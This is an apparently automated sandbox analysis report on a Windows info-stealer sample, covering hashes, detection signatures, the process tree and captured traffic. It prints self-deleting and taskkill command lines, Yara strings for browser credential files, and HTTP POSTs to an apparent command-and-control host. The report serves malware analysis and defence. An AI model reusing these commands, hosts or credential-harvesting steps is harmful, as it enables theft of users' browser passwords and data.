Play interactive tour

Edit tour

Analysis Report Cyfj6XGbkd.exe

Overview

General Information

Sample Name:	Cyfj6XGbkd.exe
Analysis ID:	346134
MD5:	63204eb716c856723a010747d58a6b00
SHA1:	7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256:	6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
Most interesting Screenshot:

Detection

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has a writeable .text section

Registers a new ROOT certificate

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a Chrome extension

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries device information via Setup API

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Conhost Parent Proces Executions

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Startup

System is w10x64

Cyfj6XGbkd.exe (PID: 6728 cmdline: 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: 63204EB716C856723A010747D58A6B00)

msiexec.exe (PID: 6912 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

56BB1610C0318054.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 MD5: 63204EB716C856723A010747D58A6B00)

1611971443428.exe (PID: 4084 cmdline: 'C:\Users\user\AppData\Roaming\1611971443428.exe' /sjson 'C:\Users\user\AppData\Roaming\1611971443428.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)

ThunderFW.exe (PID: 6312 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)

cmd.exe (PID: 4928 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5600 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

56BB1610C0318054.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 MD5: 63204EB716C856723A010747D58A6B00)

cmd.exe (PID: 5580 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MpCmdRun.exe (PID: 1724 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 2172 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cmd.exe (PID: 6244 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6420 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

cmd.exe (PID: 7052 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 7108 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)

msiexec.exe (PID: 6984 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F759AAE600C1266B09FA365BCB174CA6 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.244341295.0000000002880000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.333865446.00000000026F0000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.261783876.0000000002620000.00000040.00000001.sdmp	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.56BB1610C0318054.exe.26f0000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.2880000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.10000000.6.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.26f0000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.10000000.7.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2620000.5.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2620000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.2880000.5.raw.unpack	Ping_Command_in_EXE	Detects an suspicious ping command execution in an executable	Florian Roth	0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.32a0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
4.2.56BB1610C0318054.exe.30f0000.6.unpack	APT34_PICKPOCKET	unknown	unknown	0x1fec84:$s2: \nss3.dll 0x247cf8:$s2: \nss3.dll 0x3fa4f0:$s4: \| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); 0x1ced54:$s5: \Login Data 0x1cee44:$s5: \Login Data 0x1cef34:$s5: \Login Data 0x1cf074:$s5: \Login Data 0x1cf284:$s5: \Login Data 0x1cf304:$s5: \Login Data 0x1cf384:$s5: \Login Data 0x1cf448:$s5: \Login Data 0x1cf644:$s5: \Login Data 0x1cf754:$s5: \Login Data 0x1cf8e4:$s5: \Login Data 0x1cf954:$s5: \Login Data 0x1fecf8:$s6: %s\Mozilla\Firefox\profiles.ini 0x247d78:$s6: %s\Mozilla\Firefox\profiles.ini 0x1ced55:$s7: Login Data 0x1cee45:$s7: Login Data 0x1cef35:$s7: Login Data 0x1cf075:$s7: Login Data
Click to see the 6 entries

Sigma Overview

System Summary:

Sigma detected: Conhost Parent Proces Executions

Show sources

Source: Process started

Author: omkar72: Data: Command: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable, CommandLine: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable, CommandLine|base64offset|contains: ^, Image: C:\Program Files\Windows Defender\MpCmdRun.exe, NewProcessName: C:\Program Files\Windows Defender\MpCmdRun.exe, OriginalFileName: C:\Program Files\Windows Defender\MpCmdRun.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5564, ProcessCommandLine: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable, ProcessId: 1724

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Metadefender: Detection: 24%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	ReversingLabs: Detection: 58%

Multi AV Scanner detection for submitted file

Show sources

Source: Cyfj6XGbkd.exe	Virustotal: Detection: 40%	Perma Link
Source: Cyfj6XGbkd.exe	Metadefender: Detection: 24%	Perma Link
Source: Cyfj6XGbkd.exe	ReversingLabs: Detection: 58%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Cyfj6XGbkd.exe

Joe Sandbox ML: detected

Cryptography:

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack

Uses 32bit PE files

Show sources

Source: Cyfj6XGbkd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Spreading:

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: global traffic

HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*

Source: global traffic	HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz

Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: /

